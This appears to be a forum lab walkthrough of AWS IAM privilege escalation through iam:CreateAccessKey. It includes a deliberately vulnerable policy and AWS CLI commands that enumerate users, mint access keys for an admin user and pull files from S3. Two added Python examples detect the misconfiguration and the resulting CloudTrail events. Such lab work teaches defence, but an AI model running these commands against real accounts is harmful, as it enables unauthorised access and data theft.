Article: AWS: IAM CreateAccessKey Privilege Escalation

stihl

Moderator
While cloud providers are responsible for securing the cloud infrastructure, customers are accountable for securing everything they deploy in the cloud, including proper configuration. In this lab, we show how a low-privileged IAM user can misuse the iam:CreateAccessKey permission when that user is allowed to create access keys for another IAM user who holds elevated privileges, leading to privilege escalation. This setup highlights a common misconfiguration in IAM policies that can pose serious security risks.

Table of Contents

About iam:CreateAccessKey

Lab Setup and Prerequisite

Part 1: IAM Lab Setup


  • Creating High Privileged IAM User
  • Creating Low Privileged IAM User
Part 2: Enumeration and Exploitation

  • Prerequisite for Pentest
  • Configuring AWS CLI With Low Privileged User Credentials
  • Enumerating IAM Users with AWS CLI
  • IAM CreateAccessKey Exploitation
Analysis

Recommendations

Conclusion


About iam:CreateAccessKey

The CreateAccessKey API action can also be used to manage AWS account root user credentials. In AWS, "abusing the iam:CreateAccessKey permission" refers to a privilege escalation technique in which a user with limited permissions creates access keys for another IAM user, typically one with higher privileges, and then uses those keys to gain unauthorized access.

The API action CreateAccessKey generates a new access key ID and secret for a specified IAM user or whoever is making the request.

Lab Setup and Prerequisites

  1. An AWS account
  2. A Kali Linux VM
If you are new to the AWS platform, it is recommended to go through the AWS Lab setup first.

Part 1: IAM Lab Setup

Here are the instructions for setting up the environment. We will access the AWS console and configure the AWS Command Line Interface (CLI), along with creating IAM users and attaching an IAM policy.

Users:

  • Igt_admin: high-level access
  • Igt_raj: basic access but with risky permissions

Policy name:

  • Vuln_create_access_key: lets the user create access keys

Creating High Privileged IAM User

Navigate to IAM > Users, then click Create user to set up a new IAM identity.

  1. Give the user a user name (e.g. Igt_admin) and press Next to set the permissions.


  2. Under the Permissions options, choose Attach policies directly to configure the Igt_admin user's permissions.
  3. Select AdministratorAccess under the Permissions policies section.
AdministratorAccess – In AWS, the AdministratorAccess policy is a built-in managed policy that gives full access to all services and resources in the account when attached to a user, group, or role, which makes it the "high-privileged" target for the lab.



Creating Low Privileged IAM User

  1. Create another IAM user (e.g. Igt_raj) and press Next.


  2. Under the Permissions options, choose Attach policies directly to configure the Igt_raj user's permissions.
  3. Now select Create policy.


  4. Write a custom policy granting the following actions to the IAM user Igt_raj:
  • iam:CreateAccessKey – Allows creation of a new access key (AKIA/Secret) for a specified IAM user.
  • iam:ListUsers – Lists all IAM users in the AWS account.
  • iam:ListAttachedUserPolicies – Lists all managed policies attached to a specific IAM user.
  • iam:GetUser – Retrieves details about a specified IAM user (or the caller if none specified).
  • iam:GetPolicy – Retrieves metadata about a managed IAM policy.
  • iam:GetPolicyVersion – Retrieves a specific version document of an IAM managed policy.
Code:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "iam:CreateAccessKey",
                "iam:ListUsers",
                "iam:ListAttachedUserPolicies",
                "iam:GetUser",
                "iam:GetPolicy",
                "iam:GetPolicyVersion"
            ],
            "Resource": "*"
        }
    ]
}

This is how the policy looks after adding these actions.


  5. Provide policy details such as the policy name (Vuln_create_access_key) and description as shown in the screenshot.

  6. Attach the policy "Vuln_create_access_key" to the user Igt_raj.

  7. Lastly, create an access key for Igt_raj, selecting "Command Line Interface (CLI)" as the use case.
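The weakness in the policy above is the unrestricted Resource on iam:CreateAccessKey. The following checker is an added example (not part of the original post) that parses IAM policy documents and reports Allow statements granting that action on anything other than the caller's own user; the two embedded policies are constructed copies of the lab policy and of a hardened variant scoped with the ${aws:username} policy variable.

```python
import fnmatch
import json

# Constructed example policies (not from the original post): the lab's
# vulnerable statement, and a hardened variant that only lets a user
# manage their own keys via the ${aws:username} policy variable.
VULN_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow",
                 "Action": ["iam:CreateAccessKey", "iam:ListUsers", "iam:GetUser"],
                 "Resource": "*"}]
}""")

SAFE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow",
                 "Action": "iam:CreateAccessKey",
                 "Resource": "arn:aws:iam::*:user/${aws:username}"}]
}""")


def _as_list(value):
    """IAM allows Statement, Action and Resource to be a string or a list."""
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    """IAM action names are case-insensitive and may use '*' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def find_key_creation_risks(policy, action="iam:CreateAccessKey"):
    """Return Allow statements granting `action` on users other than the caller.

    A Resource scoped to ${aws:username} is treated as safe; anything else
    (including "*", or a missing Resource) is reported. Condition blocks are
    not evaluated, so the check is deliberately conservative.
    """
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        if not any(_action_matches(p, action) for p in actions):
            continue
        resources = _as_list(stmt.get("Resource", "*"))
        if not all("${aws:username}" in r for r in resources):
            findings.append({"statement": index, "resource": resources})
    return findings
```

Running it over a managed policy's default version document (fetched with `aws iam get-policy-version`, as later in this post) gives a quick triage of which policies allow cross-user key creation.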


Part 2: IAM Enumeration & Exploitation

Why might CreateAccessKey be used for another IAM user?

It is sometimes used to let a trusted user generate access keys for another IAM user in cases like:

  1. Emergency access – when the admin is unavailable
  2. Break-glass situations – for urgent recovery tasks
  3. Automation in scripts that manage or rotate keys
Note:

Letting users create access keys for others can lead to privilege escalation, is hard to track, and violates least privilege. It should be used with extreme caution.

"We recommend relying on temporary credentials rather than creating long-term credentials such as access keys. Instead, use roles for temporary access." (AWS IAM documentation)

Prerequisite for Pentest

  • Pentest Machine: Kali Linux
  • Test Credentials: Igt_raj user’s Access Key + Secret + Region
  • Tools: AWS-Cli (sudo apt install awscli)

Configuring AWS CLI With Low Privileged User Credentials

Configure an AWS CLI profile with the Igt_raj credentials. The values to supply are the AWS Access Key ID, the AWS Secret Access Key and the default region.

Code:
aws configure set profile.Igt_raj.aws_access_key_id <rajUser_AccessKey>
aws configure set profile.Igt_raj.aws_secret_access_key <rajUser_SecretKey>
aws configure set profile.Igt_raj.region us-east-1



Running the get-caller-identity command returns the profile details like user id and Arn. Pay close attention to the ARN, as it uniquely identifies the resource.

Code:
aws sts get-caller-identity --profile Igt_raj



Enumerating IAM Users with AWS CLI

Let's begin the real game. Run the following command; it lists all IAM users in the AWS account.

Code:
aws iam list-users --profile Igt_raj

Next, identify the attached policies. The following command shows that the user Igt_raj has the Vuln_create_access_key policy attached, indicating a possible privilege escalation risk.

Code:
aws iam list-attached-user-policies --user-name Igt_raj --profile Igt_raj



Use the following command to fetch the policy metadata, including its ARN and default version ID (v2). A default version of v2 indicates that the policy was updated, so v2 is the version to analyze.

Code:
aws iam get-policy --policy-arn arn:aws:iam::513869214449:policy/Vuln_create_access_key --profile Igt_raj



Running this command shows all the actions, effects and the actual contents of the policy.

Code:
aws iam get-policy-version --policy-arn arn:aws:iam::513869214449:policy/Vuln_create_access_key --version-id v2 --profile Igt_raj



IAM CreateAccessKey Exploitation

First, try to list S3 buckets with the low-privileged profile.

Code:
aws s3 ls --profile Igt_raj

The action is denied because no identity-based policy attached to Igt_raj grants it.



Next comes the actual exploitation of the CreateAccessKey permission: the low-privileged user requests long-term credentials for the Igt_admin user.

Code:
aws iam create-access-key --user-name Igt_admin --profile Igt_raj



Now, set up the AWS CLI credentials using the access key returned in the output above.

Code:
aws configure

Run the S3 listing again to check whether it works; this time it succeeds.

Code:
aws s3 ls

List the bucket contents; the output shows the text files it holds.

Code:
aws s3 ls s3://igt-bucket

Download the text file:

Code:
aws s3 cp s3://igt-bucket/proof.txt file_admin.txt

Display the contents of the file:

Code:
cat file_admin.txt



Analysis

This lab highlights a common security gap: overly permissive IAM policies that lack proper restrictions. Such setups can easily be exploited if not carefully reviewed and monitored. The escalation vector was:

Igt_raj → list-users / get-user → has CreateAccessKey permission → create-access-key on the admin user → obtains admin credentials → configures CLI → admin access gained

Such misconfigurations can occur due to:

  • Overly permissive trust policies without resource restrictions ("Resource": "*")
  • Improper role separation
  • Violation of the least privilege principle
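The post notes that cross-user key creation is hard to track; the escalation step above does leave a CloudTrail record, and the following detector is an added example (not part of the original post) that flags CreateAccessKey events whose target user differs from the caller. The records are constructed in CloudTrail's shape, with a placeholder account ID, and the user names mirror the lab.

```python
# Constructed CloudTrail-style records (not real events; the account ID is a
# placeholder). For IAM API calls CloudTrail puts the caller in userIdentity
# and the user whose key is being created in requestParameters.userName.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "Igt_raj",
                      "arn": "arn:aws:iam::111122223333:user/Igt_raj"},
     "requestParameters": {"userName": "Igt_admin"}},      # cross-user: alert
    {"eventTime": "2024-01-01T10:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "Igt_raj",
                      "arn": "arn:aws:iam::111122223333:user/Igt_raj"},
     "requestParameters": {"userName": "Igt_raj"}},        # own key: benign
    {"eventTime": "2024-01-01T10:06:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "userName": "Igt_admin",
                      "arn": "arn:aws:iam::111122223333:user/Igt_admin"},
     "requestParameters": None},                            # userName omitted
    {"eventTime": "2024-01-01T10:07:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "Igt_raj",
                      "arn": "arn:aws:iam::111122223333:user/Igt_raj"},
     "requestParameters": None},                            # unrelated event
]


def caller_name(identity):
    """IAM users carry userName; assumed-role sessions do not, so fall back to the ARN."""
    return identity.get("userName") or identity.get("arn")


def detect_cross_user_key_creation(events):
    """Flag CreateAccessKey calls where the target user is not the caller.

    Omitting userName makes IAM create a key for the caller itself, so that
    case is treated as self-service rotation and not alerted on.
    """
    alerts = []
    for ev in events:
        if (ev.get("eventSource"), ev.get("eventName")) != ("iam.amazonaws.com", "CreateAccessKey"):
            continue
        caller = caller_name(ev.get("userIdentity", {}))
        params = ev.get("requestParameters") or {}
        target = params.get("userName", caller)
        if target != caller:
            alerts.append({"time": ev.get("eventTime"), "caller": caller,
                           "target": target, "source_ip": ev.get("sourceIPAddress")})
    return alerts
```

In a real deployment the same comparison can be expressed as a CloudWatch Logs filter or EventBridge rule over the CloudTrail stream; the point is that the target and caller fields are both present in the event.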

